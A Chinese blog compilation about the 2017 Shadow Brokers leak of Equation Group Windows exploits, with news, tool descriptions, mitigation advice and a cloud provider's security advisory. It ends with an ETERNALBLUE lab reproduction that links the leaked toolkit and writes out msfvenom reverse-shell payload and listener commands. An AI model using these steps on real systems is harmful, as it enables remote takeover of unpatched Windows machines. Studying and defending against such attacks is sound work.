方程式又一波大规模 0day 攻击泄漏,微软这次要血崩

一大早起床是不是觉得阳光明媚岁月静好?然而网络空间刚刚诞生了一波核弹级爆炸!Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器,这次事件影响力堪称网络大地震。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000(没错,古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

故事还要从一年前说起,2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美金)。这一切听起来难以置信,以至于当时有不少安全专家对此事件保持怀疑态度,“Shadow Brokers” 的拍卖也因此一直没有成功。

北京时间 2017 年 4 月 14 日晚,“Shadow Brokers” 终于忍不住了,在推特上放出了他们当时保留的部分文件,解压密码是 “Reeeeeeeeeeeeeee”。

 

这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具(我们挑几个重要的列举如下):

  • EXPLODINGCAN 是 IIS 5/6 远程漏洞利用工具
  • ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限,漏洞编号为MS17-010,已于 2017 年 3 月修复。
  • 除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器,且基本都已修复于 2017 年 3 月。
  • ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。
  • FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
  • ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
  • ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具,漏洞编号为MS08-067,修复于2008年。
  • ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击开放了 88 端口的 Windows 2000/2003/2008/2008 R2 的域控制器,漏洞编号为MS14-068,修复于2014年。

不放不要紧,放出来吓坏了一众小伙伴。这些文件包含多个 Windows 神洞的利用工具,只要 Windows 服务器开了135、445、3389 其中的端口之一,有很大概率可以直接被攻击,这相比于当年的 MS08-067 漏洞有过之而无不及啊,如此神洞已经好久没有再江湖上出现过了。

掏出 Exp 试了一波,果然是一打一个准,这些工具的截图如下:

 

除 Windows 以外,“Shadow Brokers” 泄露的数据还显示方程式攻击了中东一些使用了 Swift 银行结算系统的银行。

 

缓解措施

所有 Windows 服务器、个人电脑,包括 XP/2003/Win7/Win8,Win 10 最好也不要漏过,全部使用防火墙过滤/关闭 137、139、445端口;对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。

其中大部分漏洞微软已于 3 月份发布相关补丁,及时更新即可修复。

参考

 

去年8月Shadow Brokers入侵了NSA的方程式小组,获取了部分软件和黑客工具——这件事大概足以让Shadow Brokers名垂青史了,虽然有关Shadow Brokers的身份仍然成迷。最初他们打算公开拍卖这些工具,但是效果并不好,据说只收到了2比特币,随后他们又转到ZeroNet平台销售部分黑客工具。然而就在今天,Shadow Brokers宣布退隐江湖,停止售卖黑客工具。

 

如果读者对该事件并不熟悉,可以阅读以下FreeBuf的文章了解详情:

2016-08-16:快报!快报!NSA被黑,或有可能成为第二个TheHackingTeam事件!

2016-08-28:围观方程式组织“杀器”ExtraBacon,思科新版ASA防火墙也遭殃

2016-09-18:解密方程式组织的Unix后门NOPEN

2016-09-22:方程式再曝0day漏洞:超84万思科设备受影响

2016-11-02:Shadow Brokers公布被NSA入侵的各国服务器名单,中国为重灾区

2016-12-16:Shadow Brokers开始直接出售NSA方程式黑客工具,欲购从速!

2016-12-21:Shadow Brokers热卖中的NSA方程式黑客工具预览:是否值得剁手?

8月份Shadow Brokers放出了两波据称是NSA方程式内部的黑客工具,其中一波免费下载——已得到专家确认,都城市可信,思科、Juniper等那段时间都因为这些漏洞而忙得团团转。但另一波收费工具,100万比特币的价格太过昂贵了,在当时的汇率相当于五亿六千八百万美金。Shadow Brokers自然没能如愿得到这么多钱。受挫的Shadow Brokers不久后恢复了斗志,在去年10月份的时候发起了第二波拍卖,这次的目标小了很多:10000比特币。然而还是失败了;后来又发起了一波尝试,依然以失败告终。

2016年12月,Shadow Brokers还没死心,他们转投到ZeroNet平台公开售卖这些黑客工具包,每一个可利用漏洞和黑客工具都明码标价,总价格仅1000比特币。(约80万美金)

上周六,Shadow Brokers还发布了新工具包——“Windows Warez”,据称可绕过市面上大多数杀毒工具。整个“Windows Warez”工具包售价750比特币,约678,630美金(从来也没便宜过)。

QQ图片20170111140902.png

Shadow Brokers宣布退隐江湖

然而就在今天,Shadow Brokers突然就从ZeroNet平台消失了。他们对此留下了一条推文,并在ZeroNet发表了一篇文章

Clipboard Image.png

大致意思是他们无力售卖这些偷来的黑客工具和漏洞利用代码。Shadow Brokers认为继续公开售卖黑客工具这种行为太过危险,他们想要的只是尽快把工具卖掉转成现金,放出免费工具只是一种营销策略。Shadow Brokers还给有兴趣的买家留了一扇门——他们的比特币钱包,当钱包收集满10000个比特币的时候他们就将重出江湖…

离开之前,他们留下了最后的“遗产”——一个免费的工具包,内含个58个文件。这58个文件包括两个会被卡巴斯基报毒的文件equationdrug.generic和equationdrug.k,以及对应的LP文件。

Clipboard Image.png

 

 

 

2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里上的业务安全,请您关注,具体漏洞详情如下:
                      


漏洞编号:
暂无
漏洞名称:
Windows系统多个SMB\RDP远程命令执行漏洞官方评级: 高危 漏洞描述: 国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,可以利用SMB、RDP服务成功入侵服务
漏洞利用条件和方式:
可以通过发布的工具远程代码执行成功利用该漏洞。
漏洞影响范围:
已知受影响的Windows版本包括但不限于:
Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

漏洞检测:
确定服务器对外开启了137、139、445、3389端口,排查方式如下:
外网计算机上telnet 目标地址445,例如:telnet 114.114.114.114 445,Telnet客户端安装步骤
漏洞修复建议(或缓解措施):

  • 微软已经发出通告 ,强烈建议您更新最新补丁;

 

工具名称 解决措施
“EternalBlue” Addressed by MS17-010
“EmeraldThread” Addressed by MS10-061
“EternalChampion” Addressed by CVE-2017-0146 & CVE-2017-0147
“ErraticGopher” Addressed prior to the release of Windows Vista
“EsikmoRoll” Addressed by MS14-068
“EternalRomance” Addressed by MS17-010
“EducatedScholar” Addressed by MS09-050
“EternalSynergy” Addressed by MS17-010
“EclipsedWing” Addressed by MS08-067
  • 目前阿里云控制台也发布了此漏洞的一键规避工具,如果您业务上没有使用[font=&amp]137、139、445端口[font=&amp],您可登录【ECS控制台】-【安全组管理】-【规则配置】使用工具一键规避此漏洞风险;

 

  • 使用安全组公网入策略限制3389远程登录源IP地址

什么是SMB服务?
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445。


什么是RDP服务?
远程桌面连接组件是从Windows 2000 Server开始由微软公司提供的,一般使用3389作为服务端口,当某台计算机开启了远程桌面连接功能后我们就可以在网络的另一端控制这台计算机了,通过远程桌面功能我们可以实时的操作这台计算机,在上面安装软件,运行程序,所有的一切都好像是直接在该计算机上操作一样。
但对外开放RDP协议端口存在着安全风险,例如:遭受黑客对服务器账号的暴力破解等,一旦破解成功,将控制服务器,因此强烈建立您对服务器进行加固 。


情报来源:

  • https://zhuanlan.zhihu.com/p/26375989?utm_medium=social&utm_source=wechat_timeline&from=timeline&isappinstalled=0
  • http://mp.weixin.qq.com/s/yPExtMfVbpNo-5S2Ymvz-w
  • https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/?from=timeline&isappinstalled=0

方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

0x01  环境搭建

  1. win2003 攻击机,ip:192.168.0.28
  2. kali 攻击机,ip:192.168.0.27
  3. win7 靶机,ip:192.168.0.14;netstat -an 查看端口开发情况,确保445端口开启
  4. 另外:win2003攻击机需要有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。
  5. 方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。
  6. 在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

0x02  测试过程

  1. 进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
  2. 根据提示,输入0创建一个新的项目,项目名为test
  3. 接下来使用use Eternalblue,一路回车:
  4. 这里要注意,根据提示选项,这里选择1,然后继续一路回车
  5. 在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 -f dll > /opt/s.dll
  6. 在msf下开启msfpaylod监听:use exploit/multi/handlerset lhost 192.168.0.27set lport 5555

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    exploit

  7. 接下来继续在windows2003上执行use Doublepulsar
  8. 根据提示选择对应系统,运行dll文件,设置dll文件路径
  9. 最后在MSF中可以看到,成功反弹shell,拿到系统权限。

0x03  参考文档

  • TOOLS文章:http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374058&idx=1&sn=2ac09acae4fe70ca80446c3385feb90c&chksm=beb07c1689c7f500cad4fb3f8e2e76f31220b569ef3617e440dacb6cbe646958065ec9493f37&mpshare=1&scene=23&srcid=0416plWIdYQXxZ61ZUEd2foy#rd
  • 边界安全文章:http://mp.weixin.qq.com/s?__biz=MzI0MzQyNzI2OA==&mid=2247484335&idx=1&sn=b5ad15e967aa13a729ee3c5890320038&chksm=e96c7104de1bf81216500f50a62a335579916b32d7ccf8b94402922fa97bb005faceea876b52&mpshare=1&scene=23&srcid=0416ztWMmZGOSUjFbBMED29b#rd

 

Leave a Reply

Your email address will not be published. Required fields are marked *